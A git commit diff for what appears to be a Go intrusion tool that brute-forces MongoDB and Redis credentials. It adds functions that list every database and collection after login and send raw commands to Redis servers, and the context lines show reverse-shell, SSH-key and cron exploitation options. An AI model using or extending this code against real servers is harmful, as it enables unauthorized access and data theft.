增加redis数据库sql查询

2026-06-16 07:07:55 +08:00 · 2022-01-10 11:23:23 +08:00
parent 555bbc5558
commit fcacf6d541
3 changed files with 42 additions and 9 deletions
--- a/cmd/all.go
+++ b/cmd/all.go
@@ -16,7 +16,6 @@ var allCmd = &cobra.Command{
 			_ = cmd.Help()
 			return
 		}
-
 		allRun(Hosts, Ports, LogBool, Runtime, PingBool)
 		return
 	},
--- a/cmd/mongo.go
+++ b/cmd/mongo.go
@@ -29,7 +29,7 @@ func BruteMongoByUser() {
 	}
 	var ips []string
 	var err error
-	if Hosts != "" {
+	if Hosts != "" && ConnHost == "" {
 		ips, err = ResolveIPS(Hosts)
 		if err != nil {
 			Println(fmt.Sprintf("resolve hosts address failed %v", err))
@@ -47,7 +47,7 @@ func BruteMongoByUser() {
 	}
 }

-func MongoAuth(info config.HostIn, user, pass string) (bool, error) {
+func MongoAuth(info config.HostIn, user, pass string) (*mgo.Session, bool, error) {

 	conf := &mgo.DialInfo{
 		Dial: func(addr net.Addr) (net.Conn, error) {
@@ -66,13 +66,13 @@ func MongoAuth(info config.HostIn, user, pass string) (bool, error) {
 	if err == nil {
 		err = db.Ping()
 		if err != nil {
-			return false, err
+			return nil, false, err
 		}
-		defer db.Close()
-		return true, nil
+		//defer db.Close()
+		return db, true, nil

 	}
-	return false, err
+	return nil, false, err
 }

 func MongoUnAuth(info config.HostIn, user, pass string) (bool, error) {
@@ -120,3 +120,17 @@ func MongoUnAuth(info config.HostIn, user, pass string) (bool, error) {
 	}
 	return flag, nil
 }
+
+func MongodbExec(session *mgo.Session) (string, error) {
+	var s string
+	dbs, err := session.DatabaseNames()
+	for _, db := range dbs {
+		if collections, err := session.DB(db).CollectionNames(); err == nil {
+			s += fmt.Sprintf("%s %v\n", db, collections)
+		}
+	}
+	if err != nil {
+		return "", err
+	}
+	return s, nil
+}
--- a/cmd/redis.go
+++ b/cmd/redis.go
@@ -34,7 +34,7 @@ func init() {
 	RedisCmd.Flags().StringVar(&RemoteHost, "rebound", "", "Rebound shell address (eg.) 192.168.1.1:4444")
 	RedisCmd.Flags().StringVar(&ConnHost, "hostname", "", "Redis will connect this address")
 	RedisCmd.Flags().StringVar(&LoginPass, "pass", "", "set login pass")
-
+	RedisCmd.Flags().StringVar(&SQLCommand, "sql", "", "Execute redis sql command")
 }

 func BruteRedisByUser() {
@@ -59,7 +59,7 @@ func BruteRedisByUser() {
 			Println(Clearln + "[*] May be you want to brute? try to add --crack")
 		}
 	}
-	if Hosts == "" && ConnHost != "" && (RemoteHost != "" || RemotePublicKey != "") {
+	if Hosts == "" && ConnHost != "" && (RemoteHost != "" || RemotePublicKey != "" || SQLCommand != "") {
 		var (
 			conn   net.Conn
 			status bool
@@ -76,6 +76,10 @@ func BruteRedisByUser() {
 				Println(fmt.Sprintf("Redis UnAuth failed %v", err))
 			}
 		}
+		if SQLCommand != "" {
+			RedisExec(conn, SQLCommand)
+			return
+		}
 		if status == true {
 			RedisExploit(conn, RemoteHost, RemotePublicKey)
 		}
@@ -269,6 +273,22 @@ func RedisExploit(conn net.Conn, RemoteHost string, Filename string) {
 	}
 }

+func RedisExec(conn net.Conn, cmd string) {
+	if cmd != "" {
+		_, err := conn.Write([]byte(fmt.Sprintf("%s\r\n", cmd)))
+		if err != nil {
+			Println(fmt.Sprintf("[!] %v", err))
+			return
+		}
+		reply, err := RedisReply(conn)
+		if err != nil {
+			Println(fmt.Sprintf("[!] %v", err))
+			return
+		}
+		Println(fmt.Sprintf("%v", string(reply)))
+	}
+}
+
 func RedisCron(conn net.Conn, RemoteHost string) (bool, error) {
 	c, s, e := RedisWrite(conn)
 	Println(fmt.Sprintf("%v %v %v", c, s, e))